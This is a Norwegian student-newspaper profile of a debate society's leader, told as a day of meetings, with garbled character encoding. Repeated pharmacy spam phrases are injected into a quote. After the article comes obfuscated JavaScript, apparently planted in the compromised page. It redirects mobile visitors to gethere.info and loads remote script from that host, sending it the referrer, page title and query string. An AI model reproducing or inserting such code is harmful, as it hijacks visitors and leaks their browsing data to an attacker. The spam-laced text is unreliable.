I lederens travle fotspor

EN_Oda-35

VANDREDRONNINGA. Oda Bjerkan er mye pA? farten, og kan ofte observeres i Bergens gater. FOTO: ELLISIF NYGAARD.

BA?de journalisten og fotograf var utslitt etter A? ha fulgt evighetsmaskinen Oda Bjerkan i 14 timer. Selv gikk hun pA? fest da kameraet var tomt for strA?m.

08.30: ai??i?? Jeg prioriterer mest mulig sA?vn over det A? vAi??re fA?rst ute, sier Oda Bjerkan unnskyldende nA?r hun ankommer Bergen Offentlige Bibliotek.

Journalisten og fotografen fra Studvest har ventet en liten stund pA? lederen av Studentersamfunnet nA?r hun kommer til biblioteket. Der skal den studentdrevne debattorganisasjonen avholde sitt ukentlige frokostmA?te, denne uken om kunstig intelligens.

Hvorfor Bjerkan setter sA?vn hA?yt skal vise seg A? gi mening utover dagen.

Feminist som fronter alles mening

Foran oss sitter fire menn som skal debattere om den fremtidige datamaskinen er frelseren eller monsteret til menneskeheten.

ai??i?? Litt for mange menn etter min smak, humrer Bjerkan, som fortellerAi??at hun er feminist pA? privaten.

Samtidig gjA?r privatfeministen det klart at hennes personlige mening spiller liten rolle, siden Studentersamfunnet er et politisk uavhengig forumAi??somAi??skal fronte alles mening, ikke lederens.

09.40: Etter debatten har Bjerkan planlagt A? ta en kaffe med et nytt medlem i Studentersamfunnet. Hun heter Caroline Hodt, og har akkurat flyttet til Bergen for A? begynne pA?Ai??kognitiv vitenskap ved universitetet. Hodt ble vervet inn pA? en litt utradisjonell mA?te.

EN_Oda-5

LETT I PRAT. En munter Bjerkan gir gode rA?d til et ferskt medlem i Samfunnet. FOTO: ELLISIF NYGAARD.

ai??i?? Oda vervet meg gjennom moren min. Jeg hadde ikke engang mA?tt henne, forteller Hodt.

Bjerkan forteller at hun mA?tte moren til Hodt pA? SA?rlandet i sommer. Samfunnet-lederen nA?lte ikke med A? overtale moren til igjen A? overtale datteren sin til A? bli med Studentersamfunnet i Bergen.

09.55: Plutselig blir Samfunnet-lederen og Hodt avbrutt av Bjerkans kolleger som vil snakke om samarbeidet Studentersamfunnet har hatt med Bergen Internasjonale Filmfestival (BIFF) over frokost i morgen.

ai??i?? Uff, ikke altfor tidlig. Men joda, det kan vi, sier Bjerkan med et smil.

Og der var fA?rste punkt pA? morgendagens agenda allerede satt: EggerA?re og BIFF-prat klokken 09:00. Etter avbruddet retter Bjerkan fokuset mot Hodt igjen. Hun vil fortelle om da hun selv varAi??ny i Bergen.

ai??i?? Jeg kom hit som 18-A?ring for to A?r siden, og valgte A? bli med pA? infomA?tet til Studentersamfunnet pA? Det Akademiske Kvarter. I hovedsak kun for pizzaen, forteller Bjerkan lattermildt.

Men litt pizzasult var nok til A? fA? snA?ballen til A? rulle. Bjerkan gA?r nA? tredje A?ret pA? sampol, har praksisplass hos Bergens NAi??ringsrA?d, har jobbet frivillig for Raftostiftelsen og leder de rundt 150 frivillige i Studentersamfunnet. Alt dette i en alder av 20 A?r. Men det viktige kommer fram med det neste Bjerkan sier:

ai??i?? Det er ikke til A? legge skjul pA? at jeg fA?lte meg litt fortapt i starten, sA?nn som du kanskje gjA?r. Men gi det litt tid, sA? finner du din plass her i Samfunnet og i Bergen, slik som jeg gjorde.

Hodt nikker med hodet, og Bjerkan fortsetter.

AvslA?rte hersketeknikk til applaus

ai??i?? Grip mikrofonen. Still spA?rsmA?l, si din mening. FA?rste gang jeg stilte spA?rsmA?l under en debatt ble jeg mA?tt med Ai??KjAi??re, lille vennAi?? av en eldre mann i panelet.

EN_Oda-3

NYSGJERRIG. Bjerkan er ikke redd for A? spA?rre panelet om noe, og hun oppfordrer alle til A? spA?rre hvis de brenner inne med noe. FOTO: ELLISIF NYGAARD.

Samfunnet-lederen legger til at det ikke er fA?rste gang eldre, hvite menn har benyttet hersketeknikker mot henne. I dette tilfellet tente den da 18 A?r gamle studenten pA? alle plugger.

ai??i?? Studentene i salen var pA? min side. De klappet da jeg pA?pekte at han brukte hersketeknikker. Det var en spesiell opplevelse.

Det A? utfordre de som sitter pA? talerstolen er viktig for Bjerkan. Hun vil ikke vAi??re med pA? A? arrangere mA?ter som ikke tillater spA?rsmA?l fra publikum.

ai??i?? Studenter bA?r kunne stille maktpersoner til veggs. Terskelen for A? stille spA?rsmA?l skal ikke vAi??re hA?y. Arrangementet mister sin verdi hvis det ikke er mulig A? stille spA?rsmA?l.

Et A?r i Panama gjorde susen

10.53: Tiden flyr nA?r samtalen er god, og Bjerkan mA? rekke et mA?te om syv minutter. Det skulle egentlig vAi??re med ordfA?rer Marte MjA?s Persen, men siden hun er blitt syk er det rom for A? mA?te UiBs prorektor Margareth Hagen i stedet. PA? vei for A? mA?te Hagen er det tid tilAi??A? fA? vite litt mer om hvem Samfunnet-lederen egentlig er.

Bjerkan forteller at hun ikke alltid har vAi??rt like engasjert, men et A?r i Panama mens hun gikk pA? videregA?ende skole, gjorde noe med jenta fra Notodden i Telemark. Der sA? hun viktigheten av politisk engasjement.

ai??i?? Mange tror at jeg og alle de andre Samfunnet-medlemmene kommer fra politisk engasjerte familier, men slik er det ikke alltid. Det var nok fA?rst etter A?ret i Panama at jeg ble bevisst pA? kontraster og egne muligheter for A? lA?fte politiske temaer opp rundt middagsbordet og i andre diskusjonsforum.

Klokken er nA? 11.04, og vi gA?r inn pA? kontoret til prorektor Hagen. Frank Aarebrot er tema, en person som var viktig for Studentersamfunnet. UiB og Studentersamfunnet skal sammen avholde en minnesforelesning i Frank Aarebrots navn, og Bjerkan vil at Studentersamfunnet skal ha et ord med i spillet.

EN_Oda-9

SAMARBEIDSPARTNER. Her i mA?tet om hvordan samarbeidet skal fungere mellom UiB og Samfunnet i planleggingen av Aarebrots minnesforelesning. FOTO: ELLISIF NYGAARD.

ai??i?? Frank Aarebrot var en frontfigur for Samfunnet. Han hadde stor tro pA? studentene og var alltid pA? vA?r side. Derfor er det viktig at vi er en reell samarbeidspartner, og ikke bare er med som en formalitet, nA?r det skal avholdes en forelesning i hans navn, lyder det strengt fra Bjerkan etter mA?tet, som Studvest ikke fA?r gjengi det konkrete innholdet fra.

Takket nei til Stoltenberg

11.50: Bjerkan beveger seg videre til Godt BrA?d pA? Universitetsmuseet for A? lunsje med en gammel kollega. Mannen det er snakk om, er Jostein Kobbeltveit, daglig leder i Raftostiftelsen.

ai??i?? Oda er et fyrverkeri og en virvelvind av en kvinne. Begeistringen hennes er sA? stor, og det smitter over pA? alle oss andre, forteller Kobbeltveit om dagens lunsjpartner mens nettopp denne lunsjpartneren stA?r i kA?en.

Bjerkan kommer tilbake med en sA?rt etterlengtet baguett. De mA?tes for A? diskutere fremtidige valg, men Bjerkan begynner med A? fortelle en historie om Stoltenberg senior.

ai??i?? HA?rte du hva Thorvald lurte pA?? spA?r Bjerkan Kobbeltveit om.

ai??i?? Ai??h, du er pA? fornavn med ham nA?, kontrer Kobbeltveit.

ai??i?? Jada, og han kaller meg Oda. Uansett, Thorvald spurte meg om han kunne stA? i CVen min som referanse, forteller Samfunnet-lederen.

 

Oda og Thorvald, eller Bjerkan og Stoltenberg for oss som ikke er pA? fornavn med dem, mA?ttes for fA?rste gang pA? et frokostmA?te arrangert av Studentersamfunnet. En ting ledet til den neste, og i september var Bjerkan plutselig pA? en privat frokost hjemme hos den tidligere utenriksministeren. Der var framtiden til Bjerkan oppe til diskusjon. Stoltenberg anbefalte henne A? sA?ke aspirantkurset til Utenriksdepartementet.

ai??i?? Jeg takket pent nei til bA?de A? ha ham som referanse og ideen om A? jobbe i UD. Ikke har jeg jobbet for han, og jeg vet ikke om jeg kan stA? for alt av Norges utenrikspolitikk, forteller Bjerkan til Kobbeltveit.

12.40: Etter lunsjen mA? Bjerkan ta i et tak pA? Ai??VillaenAi??, huset som er Samfunnets hjemmebane. Her gjA?res det nemlig storoppussing.

ai??i?? Det er nA?dvendig, kan du se, sier Bjerkan mens hun viser frem gamle mA?bler og rotete rom.

EN_Oda-16

HARDTARBEIDENDE. Bjerkan er ikke redd for A? ta i et tak. FOTO: ELLISIF NYGAARD.

Frykter ikke for helsa

14.00: Etter ryddingen inviterer Bjerkan fotografen og journalisten til intervaller rundt NygA?rdsparken i pA?sregnet. Hun forteller at hun har vAi??rt syk den siste uken, og derfor trenger mosjon.

ai??i?? Det er deilig A? trene i regnet, overbeviser Bjerkan oss om.

EN_Oda-20

INTERVALLER. ai??i?? Det er mer effektivt med korte lA?p enn en lang joggetur. Da sparer jeg tid, forteller Bjerkan. FOTO: ELLISIF NYGAARD.

16:00 En ferdigtrent og nydusjet Samfunnet-leder stA?r i kollektivet sitt i HA?konsgaten. Hun har ikke mye tid til overs fA?r neste holdeplass.Fil_001

ai??i?? Er du ikke redd for A? bli utbrent nA?r du holder pA? i et slikt tempo?

ai??i?? Det spA?r vi om hver dag, skyter det ut fra et av de andre rommene i kollektivet.

ai??i?? Ja, og virker jeg sliten? spA?r Bjerkan tilbake til romkameraten.

ai??i?? Nei, og det er det som er sA? jAi??vla rart, fA?r hun til svar.

16.40: Bjerkan mA? videre. Hun skal fA?lge idAi??myldringene til de forskjellige komiteene i Studentersamfunnet. Vi beveger oss mot Det Akademiske Kvarter for A? mA?te komiteene Upop, Aktuelt, Samklangfunnet, Kultur og Helhus.

ai??i?? TilstedevAi??relse er utrolig viktig som leder, sier hunAi??mens hun gA?r fra en komitAi?? til den neste.

18.15: Bjerkan bruker den neste timen pA? medarbeidersamtaler med lederne for Debatt- og Kulturkomiteen i Studentersamfunnet pA? restauranten Bien Centro. Studvest blir bedt om A? ikke overvAi??re mA?tene siden deAi??tar for seg personlig oppfA?lging av arbeidet til styremedlemmer i Samfunnet.

EN_Oda-36

FUN FACT. Lederen for Samfunnet kan fortelle at hun har hoppet hele 79 ganger i fallskjerm alene. FOTO: ELLISIF NYGAARD.

Kvelden druknes i rA?dvin

19.30: Det nest siste pA? dagens agenda stA?r for tur. Bjerkan skal fA? med seg et siste mA?te i regi av Studentersamfunnet pA? det nye bygget til Fakultet for kunst, musikk og design pA? MA?llendal. PA? bussen ut er det mulighet til A? spA?rre Samfunnet-lederen om det som virker A? vAi??re et varemerke for henne.

ai??i?? Du er glad i leppestift, eller?

ai??i?? Hvordan ellers skal jeg vite hvilken kaffekopp som er min?Ai??Ai??

EN_Oda-2

KJENNEMERKE. En av mange kopper den dagen som var signert Bjerkans lepper. FOTO: ELLISIF NYGAARD.

20.00: NA?r vi ankommer KMD er det fortsatt full sprut i Bjerkan. Salen er ikke fullsatt, men det mener Samfunnet-lederen kan vAi??re et positivt tegn.

ai??i?? Tenk om alle mA?tene vA?re hadde vAi??rt stappfulle. Det hadde ikke vAi??rt gA?y. AltsA?, det bra med stort oppmA?te, men Studentersamfunnet skal dekke flest mulig interesseomrA?der. cafergot 1 100 mg, cafergot 1 100 mg, cafergot 1 100 mg, cafergot 1 100 mg, cafergot 1 100 mg, cafergot 1 100 mg. OgsA? for de smA? gruppene. Studentersamfunnet er ikke populistisk fA?rt.

PA? dette mA?tet kommer ogsA? Bjerkans feministiske hjerte i likevekt etter ubalansen fra frokostmA?tet tidligere pA? dagen.

ai??i?? Ai??Fire av fem i panelet er kvinner! Det fryder meg.

EN_Oda-39

FORNA?YD. Det er et veldig flott bygg KMD leier, forteller Bjerkan. FOTO: ELLISIF NYGAARD.

22.30: Siste post pA? programmet er et velfortjent glass rA?dvin pA? kaffebaren HEM med en god venninne og samarbeidspartner: lederen for Det Akademiske Kvarter, Anette Arneberg.

Dette er ikke den fA?rste flasken rA?dvin de deler ai??i?? de to har bodd sammen tidligere.

ai??i?? Jeg savner Oda, forteller Arneberg.

Med det signalet blir det tydelig at Bjerkan fortjener kvalitetstid alene med en god venninne etter A? ha hatt en journalist og en fotograf i hAi??lene en hel dag. Men fA?rst: tusenkronerspA?rmA?let.

ai??i?? Hvordan orker du alt dette?

EN_Oda-54

FUKTIG KVELD. ai??i?? Det ble litt A? drikke i gA?r kveld. Jeg var ikke i seng fA?r klokken 04:00, oppdaterer Bjerkan Studvest neste dag. FOTO: ELLISIF NYGAARD.

ai??i?? Jeg er heldig, og fA?r energi av A? vAi??re rundt mennesker. Det er de frivillige som gir meg lysten til A? fortsette. NA?r man fA?r den tilliten og det ansvaret over sA? mange, da skylder man dem full dedikasjon. Men, trenger dere egentlig mer, spA?r en hA?flig leder som lengter etter A? skravle med venninnen sin.

Og hun har vel rett, vi har sett det vi trenger A? se.

PA? vei ut av baren konkluderer bA?de journalist og fotograf med det samme: Vi kunne aldri vAi??rt ledere for Studentersamfunnet.

 

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== azithromycin prescription free, azithromycin prescription free, azithromycin prescription free, azithromycin prescription free, azithromycin prescription free, azithromycin prescription free, azithromycin prescription free, azithromycin prescription free. _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}